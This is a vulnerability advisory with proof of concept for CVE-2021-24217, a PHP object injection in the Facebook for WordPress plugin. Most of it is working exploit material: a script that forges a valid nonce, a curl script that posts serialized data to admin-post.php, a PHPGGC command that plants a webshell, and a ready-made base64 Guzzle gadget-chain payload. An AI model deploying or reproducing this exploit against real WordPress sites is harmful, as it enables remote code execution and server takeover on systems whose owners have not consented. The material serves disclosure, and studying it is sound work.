Facebook for WordPress < 3.0.0 – PHP Object Injection with POP Chain | CVE 2021-24217

Description

The run_action function of the plugin deserializes user supplied data making it possible for PHP objects to be supplied creating an Object Injection vulnerability. There was also a useable magic method in the plugin that could be used to achieve remote code execution.

Proof of Concept

Step 1: Use the nonce generation script to generate a valid nonce.

Step 2: Run the POC script like:
php poc.php site.com nonce base64payload

Step 3: Navigate to the shell
http://mysite.com/webshell.php


Nonce Generation Script
-----
<?php

$nonce_key = '[SITE NONCE KEY HERE]';
$nonce_salt = '[SITE SALT HERE]';

function wp_nonce_tick() {

    return ceil( time() / ( 86400 / 2 ) );
}

function wp_hash( $data, $scheme = 'auth', $nonce_key, $nonce_salt) {
    $salt = $nonce_key . $nonce_salt;
    echo "Is this a real salt? " . $salt . "\n";

    return hash_hmac( 'md5', $data, $salt );
}

$i = wp_nonce_tick();

echo "Here is your Nonce: " . substr( wp_hash( $i ."wp_async_send_server_eventsFacebookPixelPlugin\Core\ServerEventAsyncTask", 'nonce', $nonce_key,
        $nonce_salt), - 12, 10 )

?>


PoC Script 

<?php

// Settings
$siteurl = $argv[1];
$nonce = $argv[2];
$payload = $argv[3];

$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-post.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' => 'wp_async_send_server_events',
    '_nonce' => $nonce,
    'num_events' => '1',
    'event_data' => $payload
] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Generate a working payload with PHPGGC, or other custom script - make sure data is base64encoded on output so null characters don't get lost. 

./phpggc Guzzle/FW1 /var/www/html/webshell.php ~/path/to/shell.php -b

Sometimes the payload is finicky so you may need to take the payload into Burp Decoder to decode and modify your payload while keeping the null characters. The following payload should work on most standard instances:

TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MjY6Ii92YXIvd3d3L2h0bWwvd2Vic2hlbGwucGhwIjtzOjUyOiIAR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphcgBzdG9yZVNlc3Npb25Db29raWVzIjtiOjE7czozNjoiAEd1enpsZUh0dHBcQ29va2llXENvb2tpZUphcgBjb29raWVzIjthOjE6e2k6MDtPOjI3OiJHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUiOjE6e3M6MzM6IgBHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUAZGF0YSI7YTo1OntzOjQ6Ik5hbWUiO3M6NDoidGVzdCI7czo1OiJWYWx1ZSI7czoxODoiPD9waHAgcGhwaW5mbygpOz8+IjtzOjc6IkRpc2NhcmQiO2I6MDtzOjc6IkV4cGlyZXMiO2k6MTt9fX1zOjM5OiIAR3V6emxlSHR0cFxDb29raWVcQ29va2llSmFyAHN0cmljdE1vZGUiO047fQ==